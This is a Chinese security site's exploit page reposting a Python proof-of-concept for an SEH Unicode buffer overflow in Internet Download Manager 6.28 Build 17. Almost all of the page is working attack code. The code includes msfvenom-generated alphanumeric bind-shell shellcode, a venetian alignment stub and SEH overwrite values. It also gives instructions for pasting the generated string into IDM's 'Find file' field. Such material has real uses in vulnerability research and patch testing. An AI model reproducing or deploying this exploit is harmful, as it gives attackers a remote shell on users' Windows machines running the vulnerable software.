首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Internet Download Manager 6.28 Build 17 - Buffer Overflow (SEH Unicode)
来源:vfocus.net 作者:f3ci 发布时间:2017-08-16  
#!/usr/bin/python
# Exploit Title: Internet Download Manager 6.28 Build 17 - 'Find file'
SEH Buffer Overflow (Unicode)
# Date: 14-06-2017
# Exploit Author: f3ci
# Tested on: Windows 7 SP1 x86
# How to exploit: Open IDM -> Downloads -> Find -> paste exploit string
into 'Find file' text field
 
#msfvenom -p windows/shell_bind_tcp LHOST=4444 -e x86/unicode_mixed
BufferRegister=EAX -a x86 --platform windows -f python
#Payload size: 782 bytes
buf = "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA"
buf += "jXAQADAZABARALAYAIAQAIAQAIAhAAAZ"
buf += "1AIAIAJ11AIAIABABABQI1AIQIAIQI11"
buf += "1AIAJQYAZBABABABABkMAGB9u4JB9lK8"
buf += "4BYpIpM0QPTIwuP1y00dtKr0LpTK22Jl"
buf += "4K1Bn4TKQbMXLOWGNjNFp1KODlml31al"
buf += "zbnLKpI16olMiqfggrhrobNwrkb2N0tK"
buf += "pJmlRk0Lzq2XJCpHkQxQoaRk29o0m1wc"
buf += "dKa9jxzCmjq9dKoDdKm1fvMakOfLfavo"
buf += "jmIqHGOHGp2UzVlCqmjXoKQmKtbUhd28"
buf += "Bk28LdIq7cOvbkJlPKtK0XML9qvsDKlD"
buf += "BkjaHPayq4LdmTQK1KQQR9aJoa9oGpoo"
buf += "OoOjRkZrjKbmOmBHMcp2IpM0RH1g2SNR"
buf += "OopTqXnlQglfzgkOyEtxdPKQIpIpmYy4"
buf += "Ntb0Phlie0rKM09oXU2J9x0Yr0Xb9mq0"
buf += "r0a0npC87zZoyO9PKOj5bwBHJbkPkaQL"
buf += "e97vrJZp0VQGRHy2GknWBGYohUR7phUg"
buf += "Gy08IoyovuogqXsDXlmk8aIoXUR7dWph"
buf += "t5bNpMaQioVuQXrCbM34ypu9Gs1Gogb7"
buf += "01xvrJjr29qF8bim365wPDldoLzajaTM"
buf += "q4ldjpuvypMtR4np26of26Mv0VnnaFaF"
buf += "OcpVPhD9HLOO1vio6u2iwpNnr6pFKO00"
buf += "Ph9xBgMMOpyofuWKHpVUcrr6qXeVruUm"
buf += "3mkO9EOLlFcLJjcPyk9PRUyugK0GN3RR"
buf += "0o2Jip23yoj5AA"
 
#venetian
venetian = "\x53"           #push ebx
venetian += "\x42"          #align
venetian += "\x58"          #pop eax
venetian += "\x42"          #align
venetian += "\x05\x02\x01"  #add eax,01000200
venetian += "\x42"          #align
venetian += "\x2d\x01\x01"  #add eax,01000100
venetian += "\x42"          #align
venetian += "\x50"          #push esp
venetian += "\x42"          #align
venetian += "\xC3"          #ret
 
nseh = "\x61\x47" # popad
seh =  "\x46\x5f" # 0x005f0046 IDMan.exe
 
buffer = "\x41" * 2192      #junk
buffer += nseh + seh        #nseh + seh
buffer += venetian          #venetian
buffer += "\x42" * 109      #junk
buffer += buf               #shellcode
buffer += "HeyCanYouFind"   #junk
buffer += "ThisFileHuh?"    #junk
 
 
filename = "C:\\Users\Lab\Desktop\idm.txt"
file = open(filename, 'w')
file.write(buffer)
file.close()
print buffer
print "[+] File created successfully"
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ALLPlayer 7.4 - Buffer Overflo
·FreeBSD 10.3 Jail SHM Issue
·Xamarin Studio for Mac 6.2.1 (
·Microsoft Edge CInputDateTimeS
·Tomabo MP4 Converter 3.19.15 -
·Microsoft Edge Charka PreVisit
·Microsoft Edge textarea.defaul
·Microsoft Edge Charka Failed R
·DALIM SOFTWARE ES Core 5.0 Bui
·Microsoft Edge Chakra PushPopF
·Synology Photo Station 6.7.3-3
·Microsoft Edge Chakra TryUndel
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved